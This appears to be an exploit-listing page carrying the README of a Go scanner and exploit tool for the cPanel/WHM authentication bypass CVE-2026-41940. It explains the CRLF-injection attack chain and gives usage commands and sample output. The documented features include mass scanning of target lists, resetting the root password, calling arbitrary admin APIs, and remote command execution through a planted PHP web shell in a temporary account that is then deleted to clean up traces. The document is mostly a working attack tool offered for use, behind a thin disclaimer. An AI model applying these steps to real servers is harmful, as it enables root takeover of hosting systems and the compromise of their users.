## https://sploitus.com/exploit?id=DABB13EE-2359-53AB-9AD3-622EB64EDCA9
# cPanel/WHM Auth Bypass Scanner & Exploit Tool
A Go command-line tool based on the Python PoC rewrite by [watchTowr](https://github.com/watchTowr). It is used to detect and exploit the **CVE-2026-41940** cPanel/WHM authentication bypass vulnerability. ## Vulnerability Overview
CVE-2026-41940 is an authentication bypass vulnerability in cPanel/WHM. The attack chain involves injecting CRLF characters into the Basic Auth header, revealing the security token and gaining WHM root access. **The attack chain consists of 4 stages:**
1. **Pre-authentication**: Send incorrect credentials to `/login/` to obtain the original `whostmgrsession` cookie.
2. **CRLF Injection**: Inject CRLF characters through the `Authorization: Basic` header, causing the server to reveal the `cpsess` security token in the `Location` header during a 307 redirection.
3. **Token Propagation**: Trigger `do_token_denied` to propagate the injected authentication data from the original storage to the cache.
4. **Permission Verification**: Use the revealed token to access `/json-api/version` to verify if root access is granted.
## Features
- **Batch Scanning**: Scan multiple targets from a file and execute them concurrently.
- **Single Target Detection**: Quickly verify a single URL.
- **URL Intelligent Handling**: Automatically handle `http://`, `https://`, and protocol-less URLs, and automatically deduplicate results.
- **Vulnerability Exploitation**:
- Modify the root password (`-passwd`).
- Call arbitrary WHM APIs (`-api`).
- Generate a one-click login URL (`-session`).
- Execute remote commands / RCE (`-cmd`).
- **Terminal Highlighting**: `[VULN]` in red, `[SAFE]` in green for highlighting vulnerabilities.
- **Result Saving**: Automatically save the vulnerable URL to a file.
## Compilation
```bash
# Requires Go 1.20+
cd cpanel-checker
go build -o cpanel-checker.
```
## Usage
### Parameter List
| Parameter | Description | Example |
|----------|--------------|--------|
| `-u` | Single target URL | `-u https://1.2.3.4:2087` |
| `-f` | File containing a list of URLs | `-f targets.txt` |
| `-o` | Output file path (default: `result.txt`) | `-o vuln.txt` |
| `-c` | Concurrent tasks (default: 10) | `-c 20` |
| `-hostname` | Manually specify the Host header (default: automatic discovery) | `-hostname cpanel.example.com` |
| `-passwd` | Modify the root password (only for `-u` mode) | `-passwd NewP@ss123` |
| `-api` | Call WHM API functions (only for `-u` mode) | `-api listaccts` |
| `-api-params` | WHM API parameters, separated by commas | `-api-params user=root,password=123` |
| `-session` | Generate a one-click login URL (only for `-u` mode) | `-session` |
| `-keep` | Keep the RCE temporary account instead of deleting it (used with `-cmd`) | `-keep` |
| `-cmd` | Execute remote commands / RCE (only for `-u` mode) | `-cmd "id"` |
### 1. Single Target Detection
```bash./cpanel-checker -u https://target:2087
```
The port defaults to `2087`. The following syntax is equivalent:
```bash./cpanel-checker -u https://target./cpanel-checker -u target
```
### 2. Batch Scanning
```bash./cpanel-checker -f targets.txt -c 20
```
`targets.txt` supports the following format (one per line, `#` lines are comments):
```
https://1.1.1.1:2087
http://2.2.2.2:2087
3.3.3.3:2087
4.4.4.4
# This is a comment
```
- Automatically deduplicate: `http://1.1.1.1` and `https://1.1.1.1` are considered the same target, only scanned once.
- Protocol-less addresses are automatically completed to `https://`.
- Addresses without a port are automatically set to `2087`.
- Results are saved to `result.txt` (can be customized using `-o`).
### 3. Modify Root Password
```bash./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
```
### 4. Call Arbitrary WHM API
```bash
# List all accounts./cpanel-checker -u https://target:2087 -api listaccts
# Call with parameters./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
```
### 5. Generate One-Click Login URL
```bash./cpanel-checker -u https://target:2087 -session
```
This will generate a URL that can be opened in a browser to access the WHM management panel.
Using the **Terminal** function in the panel allows access to an interactive root shell. > Note: `-session` is **semi-automatic** – after the tool generates the login URL, you need to manually open it in a browser. ### 6. Remote Command Execution (RCE)
```bash./cpanel-checker -u https://target:2087 -cmd "id"
```
Adding `-keep` retains a temporary account for logging into the cPanel backend:
```bash./cpanel-checker -u https://target:2087 -cmd "id" -keep
```
With `-keep`, the output will include the username, password, and cPanel login address (`https://host:2083`) of the temporary account. You can use these credentials directly to log into the cPanel panel. `-cmd` is **fully automatic**, requiring no additional manual actions. The internal process is as follows:
1. Use authentication bypass to gain root privileges.
2. Create a temporary cPanel account using the WHM API.
3. Write a PHP shell to `~/public_html/` using the UAPI (`Fileman::save_file_content`).
4. Execute commands by accessing `https://host/~tmpuser/shell.php` via HTTP.
5. Return the command output.
6. Automatically delete the temporary account (to clean up traces).
> Prerequisites: The target’s port 80 or 443 must be accessible, and Apache/httpd must be running. ### 7. Combined Use
Multiple usage parameters can be used simultaneously:
```bash
# Get login URL, execute command, and change password simultaneously./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
```
### 8. Manually Specify the Host Header
When the target IP differs from the host name configured in the cPanel, you can specify it manually:
```bash./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
```
By default, the tool automatically discovers the correct host name through a 307 redirect at `/openid_connect/cpanelid`. ## Output Example
### Batch Scanning
```
[1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
[2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
[3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
[4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
[5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
========== Scan Completed ==========
Total: 5 | Vulnerabilities Found: 2
● https://1.1.1.1:2087
● https://4.4.4.4:2087
[+] Results saved to result.txt
```
### RCE Execution
```
[*] Target: https://target:2087
[*] Mode: Vulnerability exploitation
[0] hostname = cpanel.example.com
[1] Creating a preauth session... session base = abc123def456
[2] Sending the CRLF injection (Basic auth + no-ob cookie)... leaked token = /cpsess1234567890
[3] Executing do_token_denied to propagate raw -> cache... gadget executed
[4] Verifying that we are WHM root... [+] Obtained WHM root privileges
[*] Executing remote command (RCE)... [a] Creating a temporary account: tmpabcde
[b] Writing a shell: /home/tmpabcde/public_html/random.php
[c] Executing command: id
[d] Deleting the temporary account: tmpabcde
[+] Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Done. https://target:2087 has been controlled
```
## Notes
- Usage parameters (`-passwd`, `-api`, `-session`, `-cmd`) are only available in single-target mode with `-u`. They are not supported in batch mode with `-f`.
- The tool defaults to skipping TLS certificate verification.
- The request timeout is 15 seconds.
- Lines starting with `#` in the URL file will be ignored.
## Disclaimer
This tool is intended for **authorized security testing and research** purposes only. Testing systems without authorization is illegal. Users must ensure they have explicit written permission from the owner of the target system. The author assumes no responsibility for any misuse of this tool. ## Thanks
- Original PoC: [watchTowr](https://github.com/watchTowr) / [Sina Kheirkhah (@SinSinology)](https://twitter.com/SinSinology)
- CVE: CVE-2026-41940
[source-iocs-preserved url=http://`、`https://`、无协议格式,自动去重,https://`,https://host:2083`),直接用这些凭据即可登录]